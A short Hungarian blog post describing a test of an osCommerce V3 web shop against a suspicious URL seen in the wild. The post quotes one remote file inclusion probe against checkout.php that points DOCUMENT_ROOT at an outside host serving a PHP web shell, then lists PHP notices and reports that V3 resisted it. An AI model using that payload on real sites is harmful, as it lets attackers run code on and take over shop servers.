Jegyzet

Törésvizsgálat V3 webáruházban

Hozzászólás most!

Törésteszt oscommerce V3 rendszeren

 

Felfigyeltem egy furcsa URL-re a minap. Elsőnek nem tudtam mire vélni,
de aztán az eredménye láttán, okosabb lettem. A kód segítségével el lehet különíteni a
védett és a védtelen shopokat.

http:\ezazenshopom.hucheckout.php?_SERVER[DOCUMENT_ROOT]=http:\www.apc.edu.ectemp?

Aztán megnéztem külön a http:\www.apc.edu.ectemp? fájlt is. A panda ezt az üzenetet küldte:

Panda GP 2010 jelentés:

megfertőzte a PHP/Shell vírus, ezért töröltem.

 

Hogy mik vannak!

Errorlog üzenetek alfa 6-on:

 

  • PHP Notice: Array to string conversion in osc3/includes/functions/html_output.php on line 488
  • PHP Notice: Array to string conversion in osc3/includes/functions/general.php on line 51

A hálón rákerestem az irodalomra is.
Nem gondoltam, hogy mennyire egyszerű a probléma, de a V3 most jól vizsgázott. Ez már nem a 2003-as színvonal.

Vélemény, hozzászólás?

Az e-mail címet nem tesszük közzé. A kötelező mezőket * karakterrel jelöltük

Ez az oldal az Akismet szolgáltatást használja a spam csökkentésére. Ismerje meg a hozzászólás adatainak feldolgozását .